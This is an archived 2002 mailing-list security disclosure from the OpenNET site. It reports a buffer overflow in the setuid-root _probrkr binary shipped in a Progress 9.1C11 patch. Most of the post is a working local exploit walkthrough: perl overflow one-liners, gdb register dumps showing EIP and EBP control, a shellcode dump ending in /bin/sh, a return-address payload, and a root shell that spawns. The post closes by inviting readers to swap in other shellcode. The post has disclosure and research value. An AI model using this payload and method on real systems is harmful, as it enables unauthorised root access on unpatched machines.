The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


latest Progress patch has suid issues AGAIN.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Wed, 01 May 2002 22:36:38 -0700
From: KF <[email protected]>
To: [email protected], [email protected],
Subject: latest Progress patch has suid issues AGAIN.

--------------060703040103050005020106
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Due to a flat out NO response offer once again to help Progress with 
their security issues they have not been notified about this issue
if there are any people from the PEG reading please clue your friends 
in... http://www.peg.com/usgrp.html
-KF


--------------060703040103050005020106
Content-Type: text/plain;
 name="progress_notes.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="progress_notes.txt"

Progress 9.1C11 Patch date 2002/04/26

http://www.progress.com/patches/patchlst/91C-178v.htm

Once again by ignoring my warnings and suggestions and even offers to audit code prior to release for the public, Progress 
Software has happened upon a security hole.

If you will recall from last month progress likes to GIVE you suids in their patches. Last month they GAVE us sqlcpp. Well 
they decided that in this patch that would fix sqlcpp as you can see here... 

20020403-020 * utilities: sqlload, sqldump, sqlschema
Security Bug: A buffer overflow has been reported in the sqlcpp program included with Progress, used as a SQL preprocessor.

and then be soooo generous as to GIVE you yet another suid binary and yet ANOTHER security risk to worry about. 

I can't say that this file was part of my last release... looks like fun though. 
[root@ghetto bin]# ls -al  _probrkr
-rwsrwxr-x    1 1089     110        268306 Apr 22 15:23 _probrkr

[root@ghetto bin]# ./_probrkr -S `perl -e 'print  "A" x 100'`
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         ** Unable to create dataserv.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         Unable to open or create dataserv.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         ** Unable to create ds_32638.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         Unable to open or create ds_32638.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         Unable to open dataserver log file. (2683)
01:19:15 (pid 32637) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         ** This process terminated with exit code 2. (8619)

Hrmm lets try again. 

(gdb) r  -S `perl -e 'print  "A" x 564'`
Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print  "A" x 564'`

Program received signal SIGSEGV, Segmentation fault.
0x08071725 in stncop () at eval.c:41
41      eval.c: No such file or directory.
        in eval.c
(gdb) bt
#0  0x08071725 in stncop () at eval.c:41
#1  0x080629e2 in dblgm () at eval.c:41
#2  0x20200a20 in ?? () at eval.c:41
Cannot access memory at address 0x41414141

Thats usually not good. =]

(gdb) frame 2
#2  0x20200a20 in ?? () at eval.c:41
41      in eval.c
(gdb)  i r
eax            0xbffff48b       -1073744757
ecx            0xffffffed       -19
edx            0x20202020       538976288
ebx            0x8079d28        134716712
esp            0xbffff1f0       0xbffff1f0
ebp            0x41414141       0x41414141
esi            0x2f     47
edi            0xbffff500       -1073744640
eip            0x20200a20       0x20200a20

(gdb) frame 3
Cannot access memory at address 0x41414141

that means its owned for sure I believe....

drop some shellcode on the stack ... do a lil ninja and viola

(gdb) x/10s 0xbffffeba+10
0xbffffec4:      "11۰\027\200\037^\211v\b1\210F\a\211F\f\013\211\215N\b\215V\f\2001\211@\200/bin/sh"

(gdb) r  -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
01:02:59 (pid 1463) BROKER Service: 
         11۰̀^1FF
                         
                          V
                               ̀1ۉ@̀/bin/sh

Hrmm thats hardly the output I was expecting ... an associate of mine noted that you could tamper with the 
inputs of various functions. One things you really need to note above is "01:02:59 (pid 1463)" Something was
spawned as a child process... 

check the pid 1463...
root      1463  1460  0 01:02 pts/0    00:00:00 /bin/sh

how nice a shell  spawned by the _probrkr parent id
root      1460  1413  0 01:02 pts/0    00:00:00 /home/91c11/bin/./_probrkr -S 

do a quick strace on it ... 
[40057a01] --- SIGTTIN (Stopped (tty input)) ---
[400578ef] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0
[4010fac4] ioctl(255, 0x540f, [1460])   = 0
[400578ef] rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_IGN}, 8) = 0
[40057a01] kill(0, SIGTTIN)             = 0
[40057a01] --- SIGTTIN (Stopped (tty input)) ---

If you strace that bash shell you can see that it is flipping out about not having a tty... progress won't 
let us type in an iteractive sh prompt so use some other type of shellcode. Have fun. 

-KF


--------------060703040103050005020106--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Σ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
:


Created 1996-2025 by Maxim Chirkov
, ,